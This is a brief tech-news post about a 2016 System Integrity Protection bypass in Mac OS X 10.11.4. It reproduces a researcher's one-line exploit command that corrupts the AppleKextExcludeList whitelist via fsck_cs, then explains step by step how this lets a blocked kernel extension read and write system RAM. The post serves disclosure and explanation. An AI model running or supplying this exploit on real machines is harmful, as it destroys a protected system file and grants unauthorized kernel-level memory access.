Apple Last, Week Launched iPhone SE and iPad along with that they updated iOS 9.3 and Mac OS X EI Capitan 10.11.4 but it still contains escalation vulnerability that can affect 130 Million Apple Customers. Apple given updates after this vulnerability so you should be updating your devices.
Disable AppleKextExcludeList to pwn SIP on 10.11.4: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
— Stefan Esser (@i0n1c) March 28, 2016
Don’t Miss: Israeli company can unlock the iPhone?
This expands out to…
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX fsck_cs /dev/diskX 1>&- touch /Library/Extensions/ reboot
…which creates a symbolic link to AppleKextExcludeList.kext‘s Info.plist from /dev/diskX, and then gets fsck_cs to work on /dev/diskX and pipe stdout to that linked Info.plist file, thus trashing it with garbage. We then touch all the extensions and reboot to let our changes take effect. We can do all this on the locked-out /System file because fsck_cs has the all important com.apple.rootless.install attribute.
The aforementioned Info.plist file, now destroyed, is used by SIP to whitelist some kernel extensions and specifically block others from being loaded. It normally blacklists Apple’s own kernel extension AppleHWAccess.kext, but with the configuration file destroyed, we can now load it and use it to read and write as we please from and to system RAM.